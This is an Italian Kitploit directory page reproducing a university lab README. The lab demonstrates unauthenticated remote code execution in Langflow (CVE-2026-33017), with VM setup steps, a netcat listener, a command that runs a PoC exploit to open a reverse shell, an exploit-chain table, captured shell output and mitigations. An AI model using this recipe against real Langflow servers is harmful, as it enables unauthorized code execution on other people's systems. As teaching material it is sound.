Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33017 — # Laboratorio didattico che dimostra RCE non autenticata in Langflow tramite CVE-2026-33017, con configurazione automatica della VM e un exploit PoC per reverse shell. | Kitploit
Strumenti/GitHubGitHub/jorrit-vm/cve-2026-33017
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed TeamingStrumento di Accesso RemotoSviluppo PayloadLab e Pratica
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

# Laboratorio didattico che dimostra RCE non autenticata in Langflow tramite CVE-2026-33017, con configurazione automatica della VM e un exploit PoC per reverse shell.

164 mesi faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-33017 — Langflow RCE non autenticata

HoGent CyberSecurity II — Netwerk Pentesting & Exploitatie (NPE)
Anno accademico 2025–2026

CVE CVSS Langflow


Panoramica

Questa repository contiene un ambiente di laboratorio completo e una dimostrazione di sfruttamento di CVE-2026-33017, una vulnerabilità critica di Remote Code Execution (RCE) non autenticata in Langflow ≤ 1.8.1.

Un attaccante senza alcuna autenticazione può eseguire codice Python arbitrario sul server tramite l'endpoint /api/v1/build_public_tmp/{flow_id}/flow, poiché l'input dell'utente viene passato direttamente a exec() di Python senza sandboxing o validazione.

⚠️ Disclaimer: Questa repository è destinata esclusivamente a scopi educativi in un ambiente di laboratorio controllato. Utilizzare solo su sistemi per i quali si dispone di autorizzazione esplicita.


Architettura

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   HOST MACHINE                      │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-Victim │     │    Kali-Attacker      │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    PoC exploit tool   │ │
│  │  port 7860       │     │    + internet (NAT)   │ │
│  └──────────────────┘     └───────────────────────┘ │
│          Host-only netwerk: 192.168.56.0/24         │
└─────────────────────────────────────────────────────┘

Struttura della repository

root@kitploit:~
CVE-2026-33017/
├── README.md # Questo file
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # Guida completa di deployment & attacco
└── scripts/
├── setup_vms.sh # Fase 1: creazione VM VirtualBox (HOST)
├── setup_victim.sh # Fase 2: installazione Langflow 1.8.1 (VM Ubuntu)
└── setup_attacker.sh # Fase 3: installazione tool PoC (VM Kali)

Avvio rapido

Requisiti

  • VirtualBox 7.x con VBoxManage nel PATH
  • Ubuntu_22.04-VB-64bit.vdi → rinominare in ubuntu-22.04.vdi
  • Kali_Linux-VB-64bit.vdi → rinominare in kali-linux.vdi
  • Entrambi i file VDI nella stessa cartella di setup_vms.sh

Fase 1 — Creazione delle VM (sull'host)

root@kitploit:~
bash scripts/setup_vms.sh

Fase 2 — Configurazione della VM vittima (sulla VM Ubuntu)

root@kitploit:~
# Credenziali: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

Fase 3 — Configurazione della VM attaccante (sulla VM Kali)

root@kitploit:~
# Credenziali: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

Esecuzione dell'attacco

Terminale 1 — Listener reverse shell:

root@kitploit:~
nc -lvnp 4444

Terminale 2 — Exploit:

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

Il PoC viene installato automaticamente da setup_attacker.sh.
PoC utilizzato: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


Come funziona l'exploit

PassoEndpointDescrizione
1GET /api/v1/auto_loginRecupera il token JWT superuser (AUTO_LOGIN=true)
2POST /api/v1/flows/Crea un nuovo flow pubblico tramite API
3POST /api/v1/build_public_tmp/{id}/flowInietta CustomComponent con codice Python malevolo
4exec() in validate.py:397Il codice viene eseguito senza sandboxing — RCE

Prova di esecuzione

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminale 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


Mitigazione

  • Aggiornare a Langflow ≥ 1.9.0 — rimuove il parametro data vulnerabile
  • Disattivare LANGFLOW_AUTO_LOGIN in produzione
  • Limitare l'accesso di rete alla porta 7860 tramite firewall
  • Posizionare Langflow dietro un reverse proxy con autenticazione

Riferimenti

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — Exploited in 20 hours
  • SonicWall — Technical Analysis
  • PoC di omer-efe-curkus

HoGent — Toegepaste Informatica — CyberSecurity II — 2025–2026

Scarica lo strumento